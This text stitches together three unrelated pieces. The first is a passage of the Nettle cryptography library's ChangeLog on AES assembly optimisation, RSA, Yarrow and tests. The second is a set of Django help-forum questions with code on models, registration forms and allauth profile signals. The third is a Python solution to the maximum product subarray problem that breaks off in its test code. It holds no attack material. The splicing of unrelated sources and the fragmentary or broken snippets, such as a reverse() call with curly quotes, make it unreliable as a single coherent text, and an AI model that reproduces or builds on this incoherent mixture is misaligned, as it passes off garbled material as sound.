(_aes_crypt): Update dst in the output loop. This yields a delay
slot that isn't filled yet.
(_aes_crypt): Decrement round when looping, saving yet some
instructions.
(_aes_crypt): Reformatted code as blocks of four instructions
each.
(_aes_crypt): Copy the addresses of the indexing tables into
registers at the start. No more need for the idx register.
(_aes_crypt): Deleted idx register.
(_aes_crypt): Some peep hole optimizations, duplicating some
instructions to fill nop:s, and put branch instructions on even
word addresses.
2002-02-22 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (_aes_crypt): Moved some more additions out of the
inner loop, using additional registers.
(_aes_crypt): Deleted one more addition from the inner loop, by
using the subkey pointer.
2002-02-19 Niels Möller <nisse@cuckoo.hack.org>
* configure.in (asm_path): Renamed "path" to "asm_path". Also look
for a machine.m4.
2002-02-16 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm: Use that IDX2(j) == j ^ 2
* Makefile.am (libnettle_a_SOURCES): Reordered aes-decrypt.c and
aes-encrypt.c. For some strange reason it makes the benchmark go
faster...
* sparc/aes.asm (_aes_crypt): Use double-buffering, and no
separate loop for adding the round key.
(round): Keep round index muliplied by 16, so it can be used
directly for indexing the subkeys.
(_aes_crypt): In the final loop, use ctx+round to access the
subkeys, no need for an extra register.
2002-02-15 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (_aes_crypt): Renaming variables, allocating
locals starting from %l0.
(_aes_crypt): Consistently use %l4, aka i, as the variable for the
innermost loops.
(_aes_crypt): Moved reading of ctx->nrounds out of the loop.
(_aes_crypt): In final_loop, deleted a redundant mov, and use i as
loop variable.
(_aes_crypt): Started renumbering registers in the inner loop. The
computation for the table[j] sub-expression should be kept in
register %o[j].
(_aes_crypt): Renamed more variables in the inner loop. Now the
primary variables are t0, t1, t2, t3.
* sparc/aes.asm (_aes_crypt): Swapped register %i0 and %o5, %i1
and %o0, %i2 and %o4, %i3 and %o3, %i4 and %o2.
(_aes_crypt): wtxt was stored in both %l1 and %l2 for the entire
function. Freed %l2 for other uses.
(_aes_crypt): Likewise for tmp, freeing register %o1.
* sparc/machine.m4: New file, for sparc-specific macros.
* sparc/aes.asm (_aes_crypt): Hacked the source_loop, to get rid
of yet another redundant loop variable, and one instruction.
(_aes_crypt): Strength reduce loop variable in the
inner loop, getting rid of one register.
(_aes_crypt): Use pre-shifted indices (aes_table.idx_shift), to
avoid some shifts in the inner loop.
(_aes_crypt): Don't check for nrounds==0 at the start of the loop.
* asm.m4: Define and use structure-defining macros.
* Makefile.am (%.asm): Use a GNU pattern rule, to make %.o depend
on both %.asm and asm.m4.
* aes-internal.h (struct aes_table): New subtable idx_shift.
Updated tables in aes_encrypt.c and aes_decrypt.c.
* asm.m4: Use eval to compute values.
* sparc/aes.asm (_aes_crypt): Deleted commented out old version of
the code.
* asm.m4: Added constants for individual rows of the aes table.
* aes.c (IDX0, IDX1, IDX2, IDX3): New macros, encapsualting the
structure of the idx table.
* asm.m4: Define various aes struct offsets.
* testsuite/cbc-test.c (test_cbc_bulk): Use aes_set_encrypt_key
and aes_set_decrypt_key.
* sparc/aes.asm (_aes_crypt): Use symbolic names for the fucntion
arguments.
2002-02-14 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm: Copied gcc assembler code for _aes_crypt.
* aesdata.c: New program for generating AES-related tables.
* testsuite/testutils.c (print_hex): New function (moved from
yarrow-test.c).
* testsuite/rsa-keygen-test.c (progress): Declare the ctx argument
as UNUSED.
* testsuite/cbc-test.c (test_cbc_bulk): New function, testing CBC
with larger blocks.
* yarrow256.c: Replaced uses of aes_set_key with
aes_set_encrypt_key.
* nettle-meta.h (_NETTLE_CIPHER_SEP): New macro, useful for
algorithms with separate encyption and decryption key setup.
* aes-internal.h (struct aes_table): New structure, including all
constant tables needed by the unified encryption or decryption
function _aes_crypt.
* aes.c (_aes_crypt): New function, which unifies encryption and
decryption.
AES key setup now uses two separate functions for setting
encryption and decryption keys. Applications that don't do
decryption need no inverted subkeys and no code to generate them.
Similarly, the tables (about 4K each for encryption and
decryption), are put into separate files.
* aes.h (struct aes_ctx): Deleted space for inverse subkeys. For
decryption, the inverse subkeys replace the normal subkeys, and
they are stored _in the order they are used_.
* aes-set-key.c (aes_set_key): Deleted file, code moved...
* aes-set-decrypt-key.c, aes-set-encrypt-key.c: New files,
separated normal and inverse key setup.
* aes-tables.c: Deleted, tables moved elsewhere...
* aes-encrypt.c, aes-decrypt.c: New files; moved encryption and
decryption funktions, and needed tables, into separate files.
2002-02-13 Niels Möller <nisse@cuckoo.hack.org>
* aes.c (aes_encrypt): Don't unroll the innerloop.
(aes_encrypt): Don't unroll the loop for the final round.
(aes_decrypt): Likewise, no loop unrolling.
* aes-set-key.c (aes_set_key): Reversed the order of the inverted
subkeys. They are now stored in the same order as they are used.
* aes-tables.c (itable): New bigger table, generated by aesdata.c.
* aes.c (aes_decrypt): Rewrote to use the bigger tables.
2002-02-12 Niels Möller <nisse@cuckoo.hack.org>
* aes.c (aes_encrypt): Interleave computation and output in the
final round.
* aes-internal.h (AES_SMALL): New macro.
* aes.c (aes_encrypt): Optionally use smaller rotating inner loop.
* aes-tables.c (dtbl): Replaced with table generated by aesdata.
* aes.c (aes_encrypt): Rewrite, now uses larger tables in order to
avoid rotates.
* sparc/aes.asm (aes_encrypt): Strength reduced on j, getting rid
of one register and one instruction in the inner loop.
* sparc/aes.asm (idx, aes_encrypt): Multiplied tabled values by 4,
making it possible to get rid of some shifts in the inner loop.
* configure.in: Fixed spelling of --enable-assembler. Commented
out debug echo:s.
* asm.m4: New file. For now, only doing changequote and changecom.
* sparc/aes.asm (aes_encrypt): Added comments.
(aes_encrypt): Cut off redundant instruction per block, also
saving one redundant register pointing to idx.
(idx_row): New macro. Include asm.m4.
2002-02-11 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (key_addition_8to32): Cleaned up.
Deleted gcc-generated debugging information.
* sparc/aes.asm (key_addition32): First attempt at optimization.
Made it slower ;-)
* sparc/aes.asm (key_addition32): Unrolled loop, gained 4%
speed, payed four instructions compared to gcc
generated code.
* Makefile.am (.asm.o): New rule for assembling via m4.
(libnettle_a_SOURCES): Added new rsa and aes files.
* configure.in: New command line option --enable-assembler.
Selects assembler code depending on the host system.
* rsa-decrypt.c, rsa-encrypt.c: New files for rsa pkcs#1
encryption.
* aes-set-key.c, aes-tables.c: New files, split off from aes.c.
Tables are now not static, but use a _aes_ prefix on their names.
* aes-internal.h: New file.
* cast128-meta.c (_NETTLE_CIPHER_FIX): Use _NETTLE_CIPHER_FIX.
* cbc.c (cbc_decrypt_internal): New function, doing the real CBC
procesing and requiring that src != dst.
(cbc_decrypt): Use cbc_decrypt_internal. If src == dst, use a
buffer of limited size to copy the ciphertext.
* nettle-internal.c (nettle_blowfish128): Fixed definition, with
key size in bits.
* nettle-meta.h (_NETTLE_CIPHER_FIX): New macro, suitable for
ciphers with a fixed key size.
* examples/nettle-benchmark.c (display): New function for
displaying the results, including MB/s figures.
* sparc/aes.asm: New file. Not yet tuned in any way (it's just the
code generated by gcc).
2002-02-11 Niels Möller <nisse@lysator.liu.se>
* x86/aes.asm, x86/aes_tables.asm: New assembler implementation by
Rafael Sevilla.
2002-02-06 Niels Möller <nisse@cuckoo.hack.org>
Applied patch from Dan Egnor improving the base64 code.
* base64.h (BASE64_ENCODE_LENGTH): New macro.
(struct base64_ctx): New context struct, for decoding.
(BASE64_DECODE_LENGTH): New macro.
* base64.c (base64_decode_init): New function.
(base64_decode_update): New function, replacing base64_decode.
Takes a struct base64_ctx argument.
* nettle-meta.h: Updated nettle_armor, and related typedefs and
macros.
* testsuite/testutils.c (test_armor): Updated.
* configure.in: Use AC_PREREQ(2.50).
2002-02-01 Niels Möller <nisse@cuckoo.hack.org>
* Released nettle-1.5.
2002-01-31 Niels Möller <nisse@cuckoo.hack.org>
* acinclude.m4: Commented out gmp-related macros, they're probably
not needed anymore.
2002-01-31 Niels Möller <nisse@lysator.liu.se>
* configure.in: Added command line options --with-lib-path and
--with-include-path. Use the RPATH-macros to get correct flags for
linking the test programs with gmp.
* acinclude.m4: New file.
2002-01-31 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Randomness): New subsection on Yarrow.
2002-01-30 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Randomness): New chapter.
Spell checking and ispell configuration.
* md5.c: Added reference to RFC 1321.
2002-01-24 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Public-key algorithms): Minor fixes.
2002-01-22 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Nettle soup): New chapter.
(Hash functions): New subsection on struct nettle_hash.
(Hash functions): New subsection on struct nettle_cipher.
(Keyed hash functions): New section, describing MAC:s and HMAC.
(Public-key algorithms): New chapter.
* testsuite/testutils.c (test_armor): New function.
* testsuite/base64-test.c: New testcase.
* testsuite/Makefile.am (TS_PROGS): Added base64-test.
* nettle-meta.h (struct nettle_armor): New struct.
* configure.in: Bumped version to 1.5.
* Makefile.am (libnettle_a_SOURCES): Added base64 files, and some
missing header files.
* base64.c, base64.h, base64-meta.c: New files, hacked by Dan
Egnor.
2002-01-16 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.c: Deleted ran_array code, use
knuth-lfib.h instead.
* testsuite/testutils.c (test_rsa_md5, test_rsa_sha1): Moved
functions here...
* testsuite/rsa-test.c: ...from here.
* testsuite/rsa-keygen-test.c: New file.
* testsuite/knuth-lfib-test.c: New file.
* Makefile.am (libnettle_a_SOURCES): Added knuth-lfib.c and
rsa-keygen.c.
* rsa-keygen.c: New file.
* rsa.h (RSA_MINIMUM_N_OCTETS): New constant.
(RSA_MINIMUM_N_BITS): New constant.
(nettle_random_func, nettle_progress_func): New typedefs. Perhaps
they don't really belong in this file.
(rsa_generate_keypair): Added progress-callback argument.
* macros.h (READ_UINT24, WRITE_UINT24, READ_UINT16, WRITE_UINT16):
New macros.
* knuth-lfib.c, knuth-lfib.h: New files, implementing a
non-cryptographic prng.
2002-01-15 Niels Möller <nisse@cuckoo.hack.org>
* hmac-sha1.c: New file.
2002-01-14 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/hmac-test.c (test_main): Added hmac-sha1 test cases.
* rsa.c (rsa_init_private_key, rsa_clear_private_key): Handle d.
* rsa.h (struct rsa_private_key): Reintroduced d attribute, to be
used only for key generation output.
(rsa_generate_keypair): Wrote a prototype.
* Makefile.am (libnettle_a_SOURCES): Added hmac-sha1.c and
nettle-internal.h.
* des.c: Use static const for all tables.
(des_set_key): Use a new const * variable for the parity
procesing, for constness reasons.
* list-obj-sizes.awk: New file.
* nettle-internal.c, nettle-internal.h: New files.
* testsuite/Makefile.am (TS_PROGS): Added hmac-test. Deleted old
m4-stuff.
* testsuite/testutils.h (LDATA): Moved this macro here,...
* testsuite/rsa-test.c: ... from here.
* testsuite/hmac-test.c: New file.
* hmac.h: General cleanup. Added declarations of hmac-md5,
hmac-sha1 and hmac-sha256.
* hmac.c: Bug fixes.
* hmac-md5.c: First working version.
* Makefile.am (libnettle_a_SOURCES): Added hmac.c and hmac-md5.c.
(libnettleinclude_HEADERS): Added hmac.h.
* testsuite/rsa-test.c: Also test a 777-bit key.
* rsa.c (rsa_check_size): Changed argument to an mpz_t. Updated
callers.
(rsa_prepare_private_key): Compute the size of the key by
computing n = p * q.
* rsa-compat.c: Adapted to new private key struct.
* rsa_md5.c: Likesize.
* rsa_sha1.c: Likesize.
* rsa.c (rsa_check_size): New function, for computing and checking
the size of the modulo in octets.
(rsa_prepare_public_key): Usa rsa_check_size.
(rsa_init_private_key): Removed code handling n, e and d.
(rsa_clear_private_key): Likewise.
(rsa_compute_root): Always use CRT.
* rsa.h (struct rsa_private_key): Deleted public key and d from
the struct, as they are not needed. Added size attribute.
2002-01-12 Niels Möller <nisse@cuckoo.hack.org>
* Makefile.am: Added *-meta files.
* rsa.c (rsa_init_public_key): New function.
(rsa_clear_public_key): Likewise.
(rsa_init_private_key): Likewise.
(rsa_clear_private_key): Likewise.
* aes-meta.c: New file.
* arcfour-meta.c: New file.
* cast128-meta.c: New file.
* serpent-meta.c: New file.
* twofish-meta.c: New file.
* examples/nettle-benchmark.c: Use the interface in nettle-meta.h.
2002-01-11 Niels Möller <nisse@cuckoo.hack.org>
Don't use m4 for generating test programs, it's way overkill. Use
the C preprocessor instead.
* testsuite/*-test.c: New file.
* hmac.c, hmac.h, hmac-md5.c: New files.
Defined structures describing the algoriths. Useful for code that
wants to treat an algorithm as a black box.
* nettle-meta.h, md5-meta.c, sha1-meta.c, sha256-meta.c: New
files.
2002-01-09 Niels Möller <nisse@cuckoo.hack.org>
* rsa-compat.c: Updated for new md5 and rsa conventions.
* rsa_md5.c: Represent a signature as an mpz_t, not a string.
Updated calls of md5 functions.
* rsa_sha1.c: Likewise.
* rsa.c (rsa_prepare_public_key): Renamed function, was
rsa_init_public_key.
(rsa_prepare_private_key): Renamed function, was
rsa_init_private_key.
* nettle.texinfo (Hash functions): Update for the changed
interface without *_final. Document sha256.
* testsuite/md5-test.m4, testsuite/sha1-test.m4,
testsuite/sha256-test.m4, testsuite/yarrow-test.c: Updated for new
hash function interface.
* yarrow256.c: Removed calls of sha256_final and and some calls of
sha256_init.
* md5-compat.c (MD5Final): Call only md5_digest.
* md5.c (md5_digest): Call md5_final and md5_init.
(md5_final): Declared static.
sha1.c, sha256.c: Analogous changes.
* bignum.c (nettle_mpz_get_str_256): Declare the input argument
const.
2001-12-14 Niels Möller <nisse@cuckoo.hack.org>
* Makefile.am (EXTRA_DIST): Added $(des_headers). Changed
dependencies for $(des_headers) to depend only on the source file
desdata.c, not on the executable.
2001-12-12 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.c (main): Updated testcase to match fixed
generator. Send verbose output to stdout, not stderr.
* yarrow256.c (yarrow_slow_reseed): Bug fix, update the fast pool
with the digest of the slow pool.
(yarrow256_init): Initialize seed_file and counter to zero, to
ease debugging.
2001-12-07 Niels Möller <nisse@cuckoo.hack.org>
* bignum.c (nettle_mpz_get_str_256): Fixed handling of leading
zeroes.
2001-12-05 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.c (main): Updated test to match the fixed
key event estimator.
* yarrow_key_event.c (yarrow_key_event_estimate): Fixed handling
of timing info.
* nettle.texinfo (Copyright): Say that under certain
circumstances, Nettle can be used as if under the LGPL.
* README: Added a paragraph on copyright.
2001-11-15 Niels Möller <nisse@cuckoo.hack.org>
* yarrow256.c (yarrow256_force_reseed): New function.
2001-11-14 Niels Möller <nisse@ehand.com>
* testsuite/yarrow-test.c (main): Use yarrow256_is_seeded.
* yarrow256.c (yarrow256_needed_sources): New function.
(yarrow256_is_seeded): New function.
(yarrow256_update): Use yarrow256_needed_sources.
2001-11-14 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.out: Updated, to match the seed-file aware
generator.
* testsuite/yarrow-test.c: Updated expected_output. Check the seed
file contents at the end.
* yarrow256.c (yarrow256_seed): New function.
(yarrow_fast_reseed): Create new seed file contents.
2001-11-13 Niels Möller <nisse@cuckoo.hack.org>
* yarrow.h: Deleted yarrow160 declarations.
2001-11-02 Niels Möller <nisse@ehand.com>
* yarrow256.c (yarrow256_init): Fixed order of code and
declarations.
2001-10-30 Niels Möller <nisse@ehand.com>
* rsa-compat.h: Added real prototypes and declarations.
* Makefile.am (libnettle_a_SOURCES): Added rsa-compat.h and
rsa-compat.c.
* rsa-compat.c: New file, implementing RSA ref signature and
verification functions.
* configure.in: Check for libgmp. Deleted tests for SIZEOF_INT and
friends.
* rsa_sha1.c: New file, PKCS#1 rsa-sha1 signatures.
* rsa_md5.c: New file, PKCS#1 rsa-md5 signatures.
* rsa.c: New file with general rsa functions.
* Makefile.am (libnettle_a_SOURCES): Added rsa and bignum files.
* bignum.c, bignum.h: New file, with base256 functions missing in
gmp.
* testsuite/Makefile.am: Added bignum-test.
* testsuite/run-tests (test_program): Check the xit code more
carefully, and treat 77 as skip. This convention was borrowed from
autotest.
* testsuite/macros.m4: New macro SKIP which exits with code 77.
* testsuite/bignum-test.m4: New file.
2001-10-15 Niels Möller <nisse@ehand.com>
* testsuite/Makefile.am (EXTRA_DIST): Include rfc1750.txt in the
distribution.
2001-10-14 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/des-test.m4: Added testcase taken from applied
cryptography.
* testsuite/yarrow-test.c: Use sha256 instead of sha1 for checking
input and output. Updated the expected values.
* yarrow256.c (YARROW_RESEED_ITERATIONS): New constant.
(yarrow_iterate): New function.
(yarrow_fast_reseed): Call yarrow_iterate.
* testsuite/yarrow-test.c: Added verbose flag, disabled by
default.
2001-10-12 Niels Möller <nisse@ehand.com>
* examples/nettle-benchmark.c: Added more ciphers.
* Makefile.am (SUBDIRS): Added the examples subdir.
* configure.in: Output examples/Makefile.
2001-10-12 Niels Möller <nisse@cuckoo.hack.org>
* examples/nettle-benchmark.c: New benchmarking program.
2001-10-10 Niels Möller <nisse@ehand.com>
* testsuite/yarrow-test.c: Open rfc1750.txt. Hash input and
output, and compare to expected values.
* testsuite/Makefile.am (CFLAGS): Don't disable optimization.
(run-tests): Set srcdir in the environment when running run-tests.
* testsuite/rfc1750.txt: Added this rfc as test input for yarrow.
* yarrow_key_event.c (yarrow_key_event_estimate): Check if
previous is zero.
(yarrow_key_event_init): Initialize previous to zero.
* yarrow256.c: Added debug some output.
* testsuite/yarrow-test.c (main): Better output of entropy
estimates at the end.
2001-10-09 Niels Möller <nisse@ehand.com>
* testsuite/Makefile.am (TS_PROGS): Added yarrow-test.
* testsuite/yarrow-test.c: New file.
* yarrow256.c (yarrow256_init): Initialize the sources.
(yarrow256_random): Fixed loop condition.
* yarrow.h (YARROW_KEY_EVENT_BUFFER): New constant.
* yarrow_key_event.c: New file.
* Makefile.am (libnettle_a_SOURCES): Added yarrow_key_event.c.
2001-10-08 Niels Möller <nisse@cuckoo.hack.org>
* yarrow.h (struct yarrow_key_event_ctx): New struct.
* yarrow256.c (yarrow_fast_reseed): Generate two block of output
using the old key and feed into the pool.
* yarrow.h (struct yarrow256_ctx): Deleted buffer, index and
block_count.
* yarrow256.c (yarrow_fast_reseed): New function.
(yarrow_slow_reseed): New function.
(yarrow256_update): Check seed/reseed thresholds.
2001-10-07 Niels Möller <nisse@cuckoo.hack.org>
* Makefile.am: Added yarrow files.
* yarrow256.c: New file, implementing Yarrow. Work in progress.
* sha256.c: New file, implementing SHA-256.
* testsuite/Makefile.am (CFLAGS): Added sha256-test.
* testsuite/sha256-test.m4: New testcases for SHA-256.
* shadata.c: New file, for generating SHA-256 constants.
* sha.h: Renamed sha1.h to sha.h, and added declarations for
SHA-256.
2001-10-05 Niels Möller <nisse@ehand.com>
* testsuite/aes-test.m4: Added a comment with NIST test vectors.
2001-10-04 Niels Möller <nisse@ehand.com>
* rsa.h, rsa-compat.h, yarrow.h: New files.
2001-09-25 Niels Möller <nisse@cuckoo.hack.org>
* Released version 1.0.
2001-09-25 Niels Möller <nisse@ehand.com>
* sha1.c: Include stdlib.h, for abort.
* md5.c: Include string.h, for memcpy.
* testsuite/Makefile.am (M4_FILES): New variable. Explicitly list
those C source files that should be generated by m4.
* configure.in: Changed package name from "libnettle" to "nettle".
* Makefile.am (EXTRA_DIST): Added .bootstrap.
* AUTHORS: Added a reference to the manual.
2001-09-25 Niels Möller <nisse@lysator.liu.se>
* des-compat.c (des_cbc_cksum): Bug fix, local variable was
declared in the middle of a block.
2001-09-19 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Compatibility functions): New section,
mentioning md5-compat.h and des-compat.h.
2001-09-18 Niels Möller <nisse@ehand.com>
* index.html: New file.
2001-09-16 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/des-compat-test.c (cbc_data): Shorten to 32 bytes (4
blocks), the last block of zeroes wasn't used anyway.
* des-compat.c (des_compat_des3_decrypt): Decrypt in the right
order.
(des_ncbc_encrypt): Bug fixed.
(des_cbc_encrypt): Rewritten as a wrapper around des_ncbc_encrypt.
2001-09-14 Niels Möller <nisse@ehand.com>
* testsuite/des-compat-test.c: New file, copied from libdes
(freeswan). All implemented functions but des_cbc_cksum seems to
work now.
* testsuite/Makefile.am (TS_PROGS): Added des-compat-test.
* des-compat.c: Added libdes typedef:s. Had to remove all use of
const in the process.
(des_check_key): New global variable, checked by des_set_key.
* des.c (des_set_key): Go on and expand the key even if it is
weak.
* des-compat.c (des_cbc_cksum): Implemented.
(des_key_sched): Fixed return values.
2001-09-11 Niels Möller <nisse@cuckoo.hack.org>
* Makefile.am: Added des-compat.c and des-compat.h
* des-compat.c: Bugfixes, more functions implemented.
* des-compat.h: Define DES_ENCRYPT and DES_DECRYPT. Bugfixes.
2001-09-10 Niels Möller <nisse@ehand.com>
* nettle.texinfo (Copyright): Added copyright information for
serpent.
(Miscellaneous functions): Started writing documentation on the CBC
functions.
2001-09-09 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/cbc-test.m4: Record intermediate values in a comment.
* testsuite/des3-test.m4: Likewise.
* testsuite/aes-test.m4: Added test case that appeared broken in
the cbc test.
* cbc.c (cbc_encrypt): Bug fix, encrypt block *after* XOR:ing the
iv.
* Makefile.am (libnettleinclude_HEADERS): Added cbc.h. Deleted
des3.h.
(libnettle_a_SOURCES): Added des3.c.
* testsuite/Makefile.am (TS_PROGS): Added des3-test and cbc-test.
* testsuite/cbc-test.m4: New testcase.
* testsuite/des3-test.m4: New testcase.
* cbc.h (CBC_CTX): New macro.
(CBC_ENCRYPT): New macro.
(CBC_DECRYPT): New macro.
* des.c (des_fix_parity): New function.
* des3.c: New file, implementing triple des.
2001-09-06 Niels Möller <nisse@cuckoo.hack.org>
* cbc.c, cbc.h: New files, for general CBC encryption.
* des-compat.h: Added some prototypes.
2001-09-05 Niels Möller <nisse@ehand.com>
* testsuite/Makefile.am (TS_PROGS): Added md5-compat-test.
* README: Copied introduction from the manual.
* configure.in: Bumped version to 1.0.
* Makefile.am (libnettleinclude_HEADERS): Added missing includes.
(libnettle_a_SOURCES): Added md5-compat.c and md5-compat.h.
* md5-compat.c, md5-compat.h: New files, implementing an RFC
1321-style interface.
2001-09-02 Niels Möller <nisse@cuckoo.hack.org>
* twofish.c (twofish_decrypt): Fixed for();-bug in the block-loop.
Spotted by Jean-Pierre.
(twofish_encrypt): Likewise.
2001-07-03 Niels Möller <nisse@ehand.com>
* testsuite/testutils.c: Include string.h.
* twofish.c: Include string.h.
2001-06-17 Niels Möller <nisse@lysator.liu.se>
* Makefile.am (des_headers): Dont use $(srcdir)/-prefixes as that
seems to break with GNU make 3.79.1.
* testsuite/testutils.c, testsuite/testutils.h: Use <inttypes.h>,
not <stdint.h>.
2001-06-17 Niels Möller <nisse@cuckoo.hack.org>
* Use <inttypes.h>, not <stdint.h>.
* blowfish.h (BLOWFISH_MAX_KEY_SIZE): Fixed, should be 56.
* Fixed copyright notices.
* Makefile.am (libnettle_a_SOURCES): Added desinfo.h and
desCode.h.
(info_TEXINFOS): Added manual.
(EXTRA_DIST): Added nettle.html.
(%.html): Added rule for building nettle.html.
* nettle.texinfo: New manual.
* configure.in: Bumped version to 0.2.
* testsuite/Makefile.am (TS_PROGS): Added cast128 test.
* Added CAST128.
* testsuite/serpent-test.m4: Added a few rudimentary tests
extracted from the serpent package.
* twofish.c: Adapted to nettle. Made constant tables const.
Deleted bytes_to_word and word_to_bytes; use LE_READ_UINT32 and
LE_WRITE_UINT32 instead.
(twofish_selftest): Deleted. Moved the tests to the external
testsuite.
(twofish_set_key): Don't silently truncate too large keys.
* sha1.c (sha1_update): Use unsigned for length.
* serpent.c (serpent_set_key): Read the key backwards. Fixed
padding (but there are no test vectors for key_size not a multiple
of 4).
(serpent_encrypt): Read and write data in the strange order used
by the reference implementation.
(serpent_decrypt): Likewise.
* macros.h (FOR_BLOCKS): New macro, taken from lsh.
* blowfish.h (struct blowfish_ctx): Use a two-dimensional array
for s.
* blowfish.c (initial_ctx): Arrange constants into a struct, to
simplify key setup.
(F): Deleted all but one definitions of the F function/macro.
Added a context argument, and use that to find the subkeys.
(R): Added context argument, and use that to find the subkeys.
(blowfish_set_key): Some simplification.
(encrypt): Deleted code for non-standard number of rounds. Deleted
a bunch of local variables. Using the context pointer for
everything should consume less registers.
(decrypt): Likewise.
* Makefile.am (libnettle_a_SOURCES): Added twofish.
2001-06-16 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/blowfish-test.m4: Fixed test.
* Added twofish implementation.
* blowfish.h (struct blowfish_ctx): Use the correct size for the p
array.
2001-06-15 Niels Möller <nisse@ehand.com>
* testsuite/blowfish-test.m4: Fixed testcase, use correct key
length.
* Makefile.am (libnettle_a_SOURCES): Added blowfish files.
* testsuite/blowfish-test.m4: Added one test, from GNUPG.
* Created blowfish.c and blowfish.h (from GNUPG via LSH). Needs
more work.
* aes.h: Fixed copyright notice to not mention GNU MP. XXX: Review
all nettle copyrights.
* testsuite/Makefile.am (TS_PROGS): Added tests for twofish and
blowfish.
2001-06-13 Niels Möller <nisse@ehand.com>
* Makefile.am (libnettle_a_SOURCES): Added serpent files.
2001-06-12 Niels Möller <nisse@cuckoo.hack.org>
* des.c (des_encrypt, des_decrypt): Assert that the key setup was
successful.
* testsuite/Makefile.am (TS_PROGS): Added tests for des and sha1.
* testsuite/sha1-test.m4: New file.
* testsuite/des-test.m4: New file.
* Added SHA1 files.
* Added desCore files.
* Makefile.am: Added desCore and sha1.
2001-04-17 Niels Möller <nisse@cuckoo.hack.org>
* install-sh: Copied the standard install script.
* testsuite/Makefile.am (CFLAGS): Disable optimization. Add
$(top_srcdir) to the include path.
(EXTRA_DIST): Added testutils.h, testutils.c and run-tests.
(run-tests): Fixed path to run-tests.
* Makefile.am (EXTRA_DIST): Added memxor.h.
(libnettleinclude_HEADERS): Install headers in
$(libnettleincludedir).
2001-04-13 Niels Möller <nisse@cuckoo.hack.org>
* Initial checkin.
|
Python channel too. Are you new to Django?
My models:
class Clients(models.Model):
id_client = models.BigIntegerField(primary_key=True, blank=True)
...
class Hosts(models.Model):
id_host = models.BigIntegerField(primary_key=True)
id_client = models.ForeignKey('Clients', models.DO_NOTHING, db_column='id_client', related_name='host_client_id')
...
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class RegistrationForm(UserCreationForm):
email = forms.EmailField(required = True)
class Meta:
model =User
fields =(
'username',
'first_name',
'last_name',
'email',
'password1',
'password2'
)
def save(self,commit=True):
user=super(RegistrationForm,self).save(commit=False)
user.first_name=self.cleaned_data['first_name']
user.last_name=self.cleaned_data['last_name']
user.email=self.cleaned_data['email']
if commit:
user.save()
return user
reverse(‘weather’, kwargs={‘current_location’: some_value, 'booking_ location’: another_value}) I am getting a NoReverseMatch exception. urls.py and views.py media url?
I am using Django Rest Framework and have a model with a timestamp field that I want to group by. The outcome I would like is to have something like {tournament_count: 2, start_date: datetime object, tournaments: [{...tournaments model representations}]} I currently have a queryset returning the tournament_count and start_date but now I want to drop in the actual tournaments as well.
queryset.annotate(
start_date=Trunc("time_stamp", "day", output_field=DateTimeField())
)
.values("start_date")
.annotate(tournament_count=Count("id")).order_by()
I can't figure out a solution that will work well and scale well. Any thoughts?
Hello people, has anyone here managed to create user profiles while using Django allauth for authentication? I am having challenges with "user has no profile" errors and RelatedObjectDoesNotExist, yet I have a Profile model with a OneToOne relationship to the User model, a profile view, and Django signals for creating and saving the profile.
Users/views.py
`views.py
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import ProfileUpdateForm
@login_required
def profile(request):
if request.method == 'POST':
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if p_form.is_valid():
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'p_form': p_form
}
return render(request, 'profile.html', context)
`
MODELS.PY
`
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(default='default.jpg', upload_to='profile_pics')
role = models.CharField(max_length=25,choices=role, default='Freelancer')
def __str__(self):
return f'{self.user.username} Profile'
`
SIGNALS.PY
`
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_profile(sender, instance, created, **kwargs):
    if created:
        Profile.objects.create(user=instance)

@receiver(post_save, sender=User)
def save_profile(sender, instance, **kwargs):
    instance.profile.save()
`
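As a hedged guess at the RelatedObjectDoesNotExist problem: receivers like these only fire if the signals module is actually imported when the app starts. A minimal sketch of that wiring is below; the app name users and the module path users/signals.py are assumptions, so adjust them to your project, and depending on the Django version you may also need INSTALLED_APPS to reference users.apps.UsersConfig explicitly.

# users/apps.py -- app name and module path are assumed, not taken from the post
from django.apps import AppConfig

class UsersConfig(AppConfig):
    name = 'users'

    def ready(self):
        # Importing the module registers the post_save receivers above.
        import users.signals  # noqa: F401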
|
Description
Given an integer array nums, find the contiguous subarray within an array (containing at least one number) which has the largest product.
Example 1:
Input: [2,3,-2,4]
Output: 6
Explanation: [2,3] has the largest product 6.
Example 2:
Input: [-2,0,-1]
Output: 0
Explanation: The result cannot be 2, because [-2,-1] is not a subarray.
Explanation
We need to keep track of both the minimum and the maximum product ending at the current position, because the array contains both positive and negative numbers: multiplying by a negative number turns the smallest (most negative) running product into the largest, and vice versa.
Python Solution
from typing import List

class Solution:
    def maxProduct(self, nums: List[int]) -> int:
        if not nums:
            return 0
        result = nums[0]
        min_product = max_product = 1
        for num in nums:
            choices = (num, min_product * num, max_product * num)
            max_product = max(choices)
            min_product = min(choices)
            result = max(result, max_product)
        return result
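A quick sanity check against the two examples above (a hypothetical driver, not part of the original post):

if __name__ == "__main__":
    s = Solution()
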